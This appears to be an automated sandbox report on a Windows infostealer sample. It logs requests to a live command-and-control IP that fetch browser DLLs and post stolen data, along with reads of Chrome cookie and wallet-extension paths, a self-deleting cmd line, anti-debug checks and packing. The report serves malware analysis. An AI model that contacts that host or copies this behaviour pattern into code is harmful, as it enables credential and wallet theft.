__exception__ Sept. 30, 2024, 11:19 a.m.	stacktrace: exception.instruction_r: fb 56 54 e9 21 00 00 00 5a 81 c5 04 00 00 00 33 exception.symbol: 66f6b6b7f2ec8_intro+0x432d75 exception.instruction: sti exception.module: 66f6b6b7f2ec8_intro.exe exception.exception_code: 0xc0000096 exception.offset: 4402549 exception.address: 0x15d2d75 registers.esp: 2096668 registers.edi: 3131996008 registers.eax: 31630 registers.ebp: 4010991636 registers.edx: 75938910 registers.ebx: 4294938344 registers.esi: 22902476 registers.ecx: 22914242	1
__exception__ Sept. 30, 2024, 11:19 a.m.	stacktrace: exception.instruction_r: fb ba ab 3e ca 6d e9 84 01 00 00 33 0c 24 5c 01 exception.symbol: 66f6b6b7f2ec8_intro+0x4330cd exception.instruction: sti exception.module: 66f6b6b7f2ec8_intro.exe exception.exception_code: 0xc0000096 exception.offset: 4403405 exception.address: 0x15d30cd registers.esp: 2096668 registers.edi: 3131996008 registers.eax: 0 registers.ebp: 4010991636 registers.edx: 75938910 registers.ebx: 3939837675 registers.esi: 22902476 registers.ecx: 22886062	1
__exception__ Sept. 30, 2024, 11:19 a.m.	stacktrace: exception.instruction_r: fb 56 89 e6 50 b8 e0 b7 9f 08 2d dc b7 9f 08 01 exception.symbol: 66f6b6b7f2ec8_intro+0x43948a exception.instruction: sti exception.module: 66f6b6b7f2ec8_intro.exe exception.exception_code: 0xc0000096 exception.offset: 4428938 exception.address: 0x15d948a registers.esp: 2096664 registers.edi: 22886543 registers.eax: 22908207 registers.ebp: 4010991636 registers.edx: 2130566132 registers.ebx: 2147483650 registers.esi: 22888598 registers.ecx: 779223040	1
__exception__ Sept. 30, 2024, 11:19 a.m.	stacktrace: exception.instruction_r: fb 50 89 3c 24 89 04 24 53 e9 27 01 00 00 83 c5 exception.symbol: 66f6b6b7f2ec8_intro+0x4391d2 exception.instruction: sti exception.module: 66f6b6b7f2ec8_intro.exe exception.exception_code: 0xc0000096 exception.offset: 4428242 exception.address: 0x15d91d2 registers.esp: 2096668 registers.edi: 22886543 registers.eax: 22934980 registers.ebp: 4010991636 registers.edx: 2130566132 registers.ebx: 2147483650 registers.esi: 22888598 registers.ecx: 779223040	1
__exception__ Sept. 30, 2024, 11:19 a.m.	stacktrace: exception.instruction_r: fb 68 45 81 cd 60 e9 1e fd ff ff 53 89 04 24 68 exception.symbol: 66f6b6b7f2ec8_intro+0x439875 exception.instruction: sti exception.module: 66f6b6b7f2ec8_intro.exe exception.exception_code: 0xc0000096 exception.offset: 4429941 exception.address: 0x15d9875 registers.esp: 2096668 registers.edi: 0 registers.eax: 22911100 registers.ebp: 4010991636 registers.edx: 2130566132 registers.ebx: 2147483650 registers.esi: 604277075 registers.ecx: 779223040	1
__exception__ Sept. 30, 2024, 11:19 a.m.	stacktrace: exception.instruction_r: fb 68 c9 36 4e 4f 89 1c 24 51 b9 b2 fe 59 76 81 exception.symbol: 66f6b6b7f2ec8_intro+0x4457b6 exception.instruction: sti exception.module: 66f6b6b7f2ec8_intro.exe exception.exception_code: 0xc0000096 exception.offset: 4478902 exception.address: 0x15e57b6 registers.esp: 2096668 registers.edi: 22937699 registers.eax: 604292950 registers.ebp: 4010991636 registers.edx: 22988169 registers.ebx: 1969225702 registers.esi: 604277075 registers.ecx: 4294941412	1
__exception__ Sept. 30, 2024, 11:19 a.m.	stacktrace: exception.instruction_r: fb e9 18 00 00 00 5e 53 bb 5c 16 6d 77 e9 dd 07 exception.symbol: 66f6b6b7f2ec8_intro+0x456185 exception.instruction: sti exception.module: 66f6b6b7f2ec8_intro.exe exception.exception_code: 0xc0000096 exception.offset: 4546949 exception.address: 0x15f6185 registers.esp: 2096668 registers.edi: 23016155 registers.eax: 32362 registers.ebp: 4010991636 registers.edx: 2130566132 registers.ebx: 22988311 registers.esi: 23059966 registers.ecx: 779223040	1
__exception__ Sept. 30, 2024, 11:19 a.m.	stacktrace: exception.instruction_r: fb 68 f7 f2 0e 74 89 34 24 be f0 b8 bb 2e 68 e4 exception.symbol: 66f6b6b7f2ec8_intro+0x4568be exception.instruction: sti exception.module: 66f6b6b7f2ec8_intro.exe exception.exception_code: 0xc0000096 exception.offset: 4548798 exception.address: 0x15f68be registers.esp: 2096668 registers.edi: 23016155 registers.eax: 322689 registers.ebp: 4010991636 registers.edx: 2130566132 registers.ebx: 0 registers.esi: 23030506 registers.ecx: 779223040	1
__exception__ Sept. 30, 2024, 11:19 a.m.	stacktrace: exception.instruction_r: fb 68 77 56 86 6f 89 3c 24 e9 33 fe ff ff 83 c4 exception.symbol: 66f6b6b7f2ec8_intro+0x463016 exception.instruction: sti exception.module: 66f6b6b7f2ec8_intro.exe exception.exception_code: 0xc0000096 exception.offset: 4599830 exception.address: 0x1603016 registers.esp: 2096664 registers.edi: 23078228 registers.eax: 28812 registers.ebp: 4010991636 registers.edx: 2130566132 registers.ebx: 23085051 registers.esi: 4016427926 registers.ecx: 2153642860	1

HTTP traffic contains suspicious features which may be indicative of malware related traffic (9 events)

suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.37/
suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://185.215.113.37/e2b1563c6670f193.php
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.37/0d60be0de163924d/sqlite3.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.37/0d60be0de163924d/freebl3.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.37/0d60be0de163924d/mozglue.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.37/0d60be0de163924d/msvcp140.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.37/0d60be0de163924d/nss3.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.37/0d60be0de163924d/softokn3.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.37/0d60be0de163924d/vcruntime140.dll

Performs some HTTP requests (9 events)

request	GET http://185.215.113.37/
request	POST http://185.215.113.37/e2b1563c6670f193.php
request	GET http://185.215.113.37/0d60be0de163924d/sqlite3.dll
request	GET http://185.215.113.37/0d60be0de163924d/freebl3.dll
request	GET http://185.215.113.37/0d60be0de163924d/mozglue.dll
request	GET http://185.215.113.37/0d60be0de163924d/msvcp140.dll
request	GET http://185.215.113.37/0d60be0de163924d/nss3.dll
request	GET http://185.215.113.37/0d60be0de163924d/softokn3.dll
request	GET http://185.215.113.37/0d60be0de163924d/vcruntime140.dll

Sends data using the HTTP POST Method (1 event)

request

POST http://185.215.113.37/e2b1563c6670f193.php

Allocates read-write-execute memory (usually to unpack itself) (16 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Sept. 30, 2024, 11:19 a.m.	process_identifier: 1680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7793f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 30, 2024, 11:19 a.m.	process_identifier: 1680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x778b0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 30, 2024, 11:19 a.m.	process_identifier: 1680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 143360 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x011a1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:19 a.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:19 a.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:19 a.m.	process_identifier: 1680 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:19 a.m.	process_identifier: 1680 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x009a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:19 a.m.	process_identifier: 1680 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x009b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:19 a.m.	process_identifier: 1680 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x009b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:19 a.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:19 a.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:19 a.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00aa0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:19 a.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ab0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:19 a.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00bc0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:19 a.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00530000 allocation_type: 12289 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:19 a.m.	process_identifier: 1680 region_size: 995328 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x61e00000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1

Steals private information from local Internet browsers (50 out of 5864 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\Local Extension Settings\cjmkndjhnagcfbpiemnkdpomccnjblmj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\recovery\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Local Extension Settings\djclckkglechooblngghdinmeemkbgci\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Last Version\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Last Version\Local Extension Settings\lpilbniiabackdjcionkobglmddfbcjo\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\Local Extension Settings\apenkfbbpmhihehmihndmmcdanacolnh\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Cookies-journal\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Local Extension Settings\aodkkagnadcbobfpggfnjeongemjbjca\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\fil\messages.json\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SwReporter\Local Extension Settings\aijcbedoijmgnlmjeegjaglmepbmpkpi\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PnaclTranslationCache\Local Extension Settings\ciojocpkclfflombbcfigcijjcbkmhaf\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SafetyTips\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\RecoveryImproved\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opfgelmcmbiajamepnmloijbpoleiama\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\sv\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Local Extension Settings\fiikommddbeccaoicoejoniammnalkfa\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Local Extension Settings\oboonakemofpalcgghocfoadofidjkkk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_2\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Cookies-journal\Local Extension Settings\fooolghllnmhmmndgjiamiiodkpenpbb\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PnaclTranslationCache\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\recovery\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\LOCK\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8620.824.0.0_0\_locales\fa\messages.json\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\Local Extension Settings\bfogiafebfohielmmehodmfbbebbbpei\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ZxcvbnData\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\MANIFEST-000001\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SafetyTips\Local Extension Settings\naepdomgkenhinolocfifgehidddafch\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\omaabbefbmiijedngplfjmnooppbclkk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SafetyTips\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Local Extension Settings\bmikpgodpkclnkgmnpphehdgcimmided\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Local Extension Settings\fdjamakpfbbddfjaooikfcpapjohcfmg\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobl\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Channel IDs\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch\CURRENT

Creates executable files on the filesystem (6 events)

file	C:\ProgramData\freebl3.dll
file	C:\ProgramData\msvcp140.dll
file	C:\ProgramData\nss3.dll
file	C:\ProgramData\vcruntime140.dll
file	C:\ProgramData\mozglue.dll
file	C:\ProgramData\softokn3.dll

Creates a suspicious process (2 events)

cmdline	C:\Windows\System32\cmd.exe /c timeout /t 5 & del /f /q "C:\Users\test22\AppData\Local\Temp\66f6b6b7f2ec8_intro.exe" & del "C:\ProgramData\*.dll"" & exit
cmdline	"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\test22\AppData\Local\Temp\66f6b6b7f2ec8_intro.exe" & del "C:\ProgramData\*.dll"" & exit

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\66f6b6b7f2ec8_intro.exe

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Sept. 30, 2024, 11:19 a.m.	show_type: 0 filepath_r: C:\Windows\system32\cmd.exe parameters: /c timeout /t 5 & del /f /q "C:\Users\test22\AppData\Local\Temp\66f6b6b7f2ec8_intro.exe" & del "C:\ProgramData\*.dll"" & exit filepath: C:\Windows\System32\cmd.exe	1	1	0

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (30 events)

Time & API	Arguments	Status	Return
Process32NextW Sept. 30, 2024, 11:19 a.m.	snapshot_handle: 0x00000378 process_name: smss.exe process_identifier: 232	1	1
Process32NextW Sept. 30, 2024, 11:19 a.m.	snapshot_handle: 0x00000378 process_name: csrss.exe process_identifier: 308	1	1
Process32NextW Sept. 30, 2024, 11:19 a.m.	snapshot_handle: 0x00000378 process_name: csrss.exe process_identifier: 356	1	1
Process32NextW Sept. 30, 2024, 11:19 a.m.	snapshot_handle: 0x00000378 process_name: winlogon.exe process_identifier: 392	1	1
Process32NextW Sept. 30, 2024, 11:19 a.m.	snapshot_handle: 0x00000378 process_name: services.exe process_identifier: 436	1	1
Process32NextW Sept. 30, 2024, 11:19 a.m.	snapshot_handle: 0x00000378 process_name: lsass.exe process_identifier: 452	1	1
Process32NextW Sept. 30, 2024, 11:19 a.m.	snapshot_handle: 0x00000378 process_name: svchost.exe process_identifier: 560	1	1
Process32NextW Sept. 30, 2024, 11:19 a.m.	snapshot_handle: 0x00000378 process_name: svchost.exe process_identifier: 636	1	1
Process32NextW Sept. 30, 2024, 11:19 a.m.	snapshot_handle: 0x00000378 process_name: svchost.exe process_identifier: 716	1	1
Process32NextW Sept. 30, 2024, 11:19 a.m.	snapshot_handle: 0x00000378 process_name: svchost.exe process_identifier: 780	1	1
Process32NextW Sept. 30, 2024, 11:19 a.m.	snapshot_handle: 0x00000378 process_name: svchost.exe process_identifier: 824	1	1
Process32NextW Sept. 30, 2024, 11:19 a.m.	snapshot_handle: 0x00000378 process_name: audiodg.exe process_identifier: 896	1	1
Process32NextW Sept. 30, 2024, 11:19 a.m.	snapshot_handle: 0x00000378 process_name: svchost.exe process_identifier: 984	1	1
Process32NextW Sept. 30, 2024, 11:19 a.m.	snapshot_handle: 0x00000378 process_name: svchost.exe process_identifier: 340	1	1
Process32NextW Sept. 30, 2024, 11:19 a.m.	snapshot_handle: 0x00000378 process_name: spoolsv.exe process_identifier: 1060	1	1
Process32NextW Sept. 30, 2024, 11:19 a.m.	snapshot_handle: 0x00000378 process_name: taskhost.exe process_identifier: 1112	1	1
Process32NextW Sept. 30, 2024, 11:19 a.m.	snapshot_handle: 0x00000378 process_name: svchost.exe process_identifier: 1120	1	1
Process32NextW Sept. 30, 2024, 11:19 a.m.	snapshot_handle: 0x00000378 process_name: dwm.exe process_identifier: 1192	1	1
Process32NextW Sept. 30, 2024, 11:19 a.m.	snapshot_handle: 0x00000378 process_name: explorer.exe process_identifier: 1236	1	1
Process32NextW Sept. 30, 2024, 11:19 a.m.	snapshot_handle: 0x00000378 process_name: svchost.exe process_identifier: 1744	1	1
Process32NextW Sept. 30, 2024, 11:19 a.m.	snapshot_handle: 0x00000378 process_name: pw.exe process_identifier: 1888	1	1
Process32NextW Sept. 30, 2024, 11:19 a.m.	snapshot_handle: 0x00000378 process_name: SearchIndexer.exe process_identifier: 1652	1	1
Process32NextW Sept. 30, 2024, 11:19 a.m.	snapshot_handle: 0x00000378 process_name: mobsync.exe process_identifier: 1664	1	1
Process32NextW Sept. 30, 2024, 11:19 a.m.	snapshot_handle: 0x00000378 process_name: pw.exe process_identifier: 1696	1	1
Process32NextW Sept. 30, 2024, 11:19 a.m.	snapshot_handle: 0x00000378 process_name: taskhost.exe process_identifier: 2004	1	1
Process32NextW Sept. 30, 2024, 11:19 a.m.	snapshot_handle: 0x00000378 process_name: SearchProtocolHost.exe process_identifier: 1256	1	1
Process32NextW Sept. 30, 2024, 11:19 a.m.	snapshot_handle: 0x00000378 process_name: conhost.exe process_identifier: 496	1	1
Process32NextW Sept. 30, 2024, 11:19 a.m.	snapshot_handle: 0x00000378 process_name: SearchFilterHost.exe process_identifier: 316	1	1
Process32NextW Sept. 30, 2024, 11:19 a.m.	snapshot_handle: 0x00000378 process_name: 66f6b6b7f2ec8_intro.exe process_identifier: 1680	1	1
Process32NextW Sept. 30, 2024, 11:19 a.m.	snapshot_handle: 0x00000378 process_name: pw.exe process_identifier: 1020	1	1

An executable file was downloaded by the process 66f6b6b7f2ec8_intro.exe (7 events)

Time & API	Arguments	Status	Return
InternetReadFile Sept. 30, 2024, 11:19 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL×Ýc¿à!& @àa0: Ð* Ð0 ¨@ < Ð.text%&`P`.data\|'@(,@`À.rdatapDpFT@`@.bss(À`À.edata*Ð,@0@.idataÐ Æ@0À.CRT, Ô@0À.tls Ö@0À.rsrc¨0 Ø@0À.reloc<@ >Þ@0B/48 @@B/19RÈ Ê" @B/31]'`(ì @B/45-.@B/57\ÀB@0B/70#ÐN@B/81 request_handle: 0x00cc000c	1	1
InternetReadFile Sept. 30, 2024, 11:19 a.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELó4cà"!4pÐ Ëý @AH S È xF P/ ð# ¤ @.text `.rdataÄ @@.data<F0 @À.00cfg @@.rsrcx @@.relocð# $" @B request_handle: 0x00cc000c	1	1
InternetReadFile Sept. 30, 2024, 11:19 a.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEL¤4cà"!¶^À¹ jª @A`ãWä·, ° P/0 ØAS¼øhÐ ì¼ÜäZ.textaµ¶ `.rdata Ð º@@.dataDàÄ@À.00cfg È@@.tls Ê@À.rsrc° Ì@@.relocØA0 BÖ@B request_handle: 0x00cc000c	1	1
InternetReadFile Sept. 30, 2024, 11:19 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $Ù1Cò_ò_ò_)n°ò_Ìò_ò^"ò_Ï^ò_Ï\ò_Ï[Óò_ÏZÑò_Ï_ò_Ï ò_Ï]ò_Richò_PELê0]à"!(`Ù@ ð,à@AgÏèr ðèA°¬=`x8¸w@päÀc@.text&( `.dataH)@,@À.idata¬pD@@.didat4X@À.rsrcð Z@@.reloc¬=°>^@B request_handle: 0x00cc000c	1	1
InternetReadFile Sept. 30, 2024, 11:19 a.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELÐ4cà"!Ø.`£pl- @Aä&úÞÄ@Px P/`\°ð \|Ê\&@.text×Ø `.rdatalïððÜ@@.dataDRà.Ì@À.00cfg@ú@@.rsrcxPü@@.reloc\` @B request_handle: 0x00cc000c	1	1
InternetReadFile Sept. 30, 2024, 11:19 a.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELó4cà"!ÌðPÏSg@ADvSwð°ÀP/ÀÈ58qà {.text&ËÌ `.rdataÔ«à¬Ð@@.data\|@À.00cfg @@.rsrc°@@.relocÈ5À6@B request_handle: 0x00cc000c	1	1
InternetReadFile Sept. 30, 2024, 11:19 a.m.	buffer: MZÿÿ¸@èº´ Í!¸LÍ!This program cannot be run in DOS mode. $ÀÅäÕ¤¤¤08e¤Ü¤¤¬¤ÖÌ¤ÖÌ¤ÖÌ¤ÖÌ¤ÖÌu¤ÖÌ¤Rich¤PEL\|ê0]à"!ÞÙð 0Ôm@Aàã ¸úðA 8¸ @´.textôÜÞ `.dataôðâ@À.idataä@@.rsrcê@@.reloc î@B request_handle: 0x00cc000c	1	1

The binary likely contains encrypted or compressed data indicative of a packer (3 events)

section

{u'size_of_data': u'0x00022800', u'virtual_address': u'0x00001000', u'entropy': 7.982925802705187, u'name': u' \\x00 ', u'virtual_size': u'0x0025b000'}

entropy

7.98292580271

description

A section with a high entropy has been found

section

{u'size_of_data': u'0x0019b400', u'virtual_address': u'0x004fa000', u'entropy': 7.9540516326021224, u'name': u'zxnwjsqe', u'virtual_size': u'0x0019c000'}

entropy

7.9540516326

description

A section with a high entropy has been found

entropy

0.994145525509

description

Overall entropy of this PE file is high

Expresses interest in specific running processes (1 event)

process

system

Yara rule detected in process memory (9 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Queries for potentially installed applications (50 out of 52 events)

Time & API	Arguments	Status
RegOpenKeyExA Sept. 30, 2024, 11:19 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000378 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
